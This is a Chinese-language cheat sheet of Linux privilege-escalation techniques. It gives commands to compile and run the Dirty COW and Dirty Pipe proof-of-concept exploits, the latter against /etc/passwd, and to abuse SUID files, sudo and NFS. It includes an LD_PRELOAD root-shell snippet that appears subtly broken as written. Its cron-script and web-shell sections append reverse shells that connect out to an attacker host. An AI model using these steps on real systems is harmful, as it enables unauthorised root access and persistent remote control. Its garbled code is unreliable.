1.脏牛提权

原因：

内存子系统处理写入复制时，发生内存条件竞争，任务执行顺序异常，可导致应用崩溃，进一步执行其他代码。get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中，可能产出竞态条件造成COW过程被破坏，导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE（映射_私有）标记的只读文件映射区域写数据时，会产生一个映射文件的复制(COW)，对此区域的任何修改都不会写回原来的文件，如果上述的竞态条件发生，就能成功的写回原来的文件。

使用公开的POC进行利用

gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w

2.文件覆盖

攻击者可以通过此漏洞写入任意文件，包括权限提升。

1. 创建一个管道。
2. 用任意数据填充管道（在所有ring entries中设置PIPE_BUF_FLAG_CAN_MERGE标志）
3. 将管道排空（在struct pipe_inode_info环上的所有struct pipe_buffer实例中保持该标志的设置）
4. 将目标文件（用O_RDONLY打开）中的数据从目标偏移量之前拼接到管道中
5. 向管道中写入任意数据；由于PIPE_BUF_FLAG_CAN_MERGE被设置，该数据将覆盖缓存的文件页，而不是创建一个新的匿名的struct pipe_buffer。

使用公开的POC进行利用

gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd

3. SUID文件

检查系统中具有SUID位的文件，这些文件在执行时以文件所有者的权限运行

# 查找SUID文件
find / -perm -4000 2>/dev/null
# 如果找到有漏洞的SUID文件，可以尝试利用
/usr/bin/passwd

4.sudo配置错误

sudoers配置文件，看看是否有任何普通用户可以执行的高权限命令。

sudo -l
# 如果有可执行的命令，如无需密码运行某些命令，可以利用提权
sudo /bin/bash

5. 环境变量漏洞

程序会使用不安全的环境变量，攻击者可以利用这些环境变量提权。

# 利用LD_PRELOAD提权
echo 'int main(){setgid(0); setuid(0); system("/bin/bash");}' > /tmp/priv_esc.c
gcc -fPIC -shared -o /tmp/priv_esc.so /tmp/priv_esc.c -nostartfiles
sudo LD_PRELOAD=/tmp/priv_esc.so <vulnerable_program>

6.可写脚本

计划任务执行的脚本可被普通用户修改，攻击者可以插入恶意代码。

# 查找可写的计划任务脚本
find /etc/cron* -writable 2>/dev/null
# 编辑脚本插入恶意代码，如反弹shell
echo 'bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1' >> /etc/cron.hourly/backup.sh

7. NFS共享

如果NFS共享配置不安全，可以挂载共享目录并进行提权。

# 挂载NFS共享
mount -o rw,vers=2 <target_ip>:/shared /mnt
# 尝试在共享目录中写入或执行高权限文件

Web应用漏洞

利用Web应用的漏洞（如RCE、文件上传等）进行提权。

# 通过Web Shell进行提权
/bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1